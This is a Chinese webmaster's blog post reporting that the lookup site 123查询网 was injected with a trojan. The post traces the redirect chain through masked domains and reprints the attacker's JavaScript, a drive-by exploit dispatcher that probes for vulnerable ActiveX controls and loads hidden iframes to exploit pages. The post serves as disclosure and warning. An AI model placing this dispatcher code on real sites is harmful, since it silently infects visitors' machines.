现在是凌晨2点45分，作为一个草根站长的我还没有睡觉，应该凡是铁杆站长的应该现在都还没睡吧(废话)!

　　本来是要查自己刚注册的一个小游戏的网站域名解析是否生效了，所以就到123查询网查询了一下，结果令我吃惊的是出现的一片乱码，难道是我输入的网址输错了?结果仔细一看并没有输错啊。再查看一下代码，结果令我大吃一惊，PHP编写的123查询网居然被挂马了，难道除了ASP现在连PHP也不安全了吗?以我分析的话按理说123查询网流量这么大，在国内也算是数得着的一流站点了，怎么会出现这样的情况,难道是服务器安全问题吗?还是黑客找到了新的PHP漏洞?一连串的问题出现在我的脑海中!

　　123查询网被挂的是什么马?是哪位高人挂的啊，看了下代码被插入的马调用的(为了不让大家打开网页，害怕有毒，所以吧域名加了个*)nima12*.cn/zz.htm?a005 再打开这个页面后又是一个调用laoda123*.cn/web.htm，这个页面里的代码如下：

        <script>
        document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
        document.write("<iframe width=100 height=0 src=xx.htm></iframe>");
        window.status="完成";
        window.onerror=function(){return true;}
        if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
        document.write("<iframe width=100 height=0 src=Ms06014.htm></iframe>");
        try{var m;
        var hw=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
        catch(m){};                     
        finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0

        src=office.htm></iframe>");}}
        try{var n;
        var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
        catch(n){};                     
        finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0

         src=UU.htm></iframe>");}}
         try{var b;
        var ml=new ActiveXObject("DPClient.Vod");}
        catch(b){};                     
        finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 

        src=Thunder.htm></iframe>");}}
        try{var f;
        var gw=new ActiveXObject("GLIEDown.IEDown.1");}
        catch(f){};                     
        finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0

        src=lz.htm></iframe>");}}
        function test()
        {
        rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
        try
        {
        Like = new ActiveXObject(rrooxx);
        }catch(error){return;}
        vvvvv = Like.PlayerProperty("PRODUCTVERSION");
        if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
        document.write("<iframe width=100 height=0 src=real10.htm></iframe>");
        else
        document.write("<iframe width=100 height=0 src=Real11.htm></iframe>");
        }
        test();
        document.write("");
        </script>
 

        连环调用了好几个页面，估计是为了刷流量吧，或者有插件？123查询网的流量如此巨大，确实给黑客带去了不少东西呵呵。

        现在是凌晨3点40分，123查询网的站长还没做出反应，可能是不知道自己的站点除了问题，也可能是在积极调整服务器！

        我个人感觉大家都是中国人，兔子不吃窝边草，为什么有的高手非要破坏别人的网站呢？真诚的希望高手们一致对外，真的要搞破坏也不要拿自己人开刀！当然我说这句话可能有的黑客高手要不高兴了，不过我说的是实话，还希望各位高手下手之前先想一想，如果是自己的网站被黑了是什么感觉呢？让我们共同为中国的网络事业做出点贡献不好么？不要再让国外的一些人渣瞧不起了！

        在此祝你早日修复123查询网，因为我一直在用，应该是好多人都在用，希望贵站越办越好！

本站提供网站制作、网站建设等知识,部份资料来自互联网 京ICP备06038928号
网站建站知识网 www.ccacc.org.cn 2005-2008 版权所有 联系QQ:260785812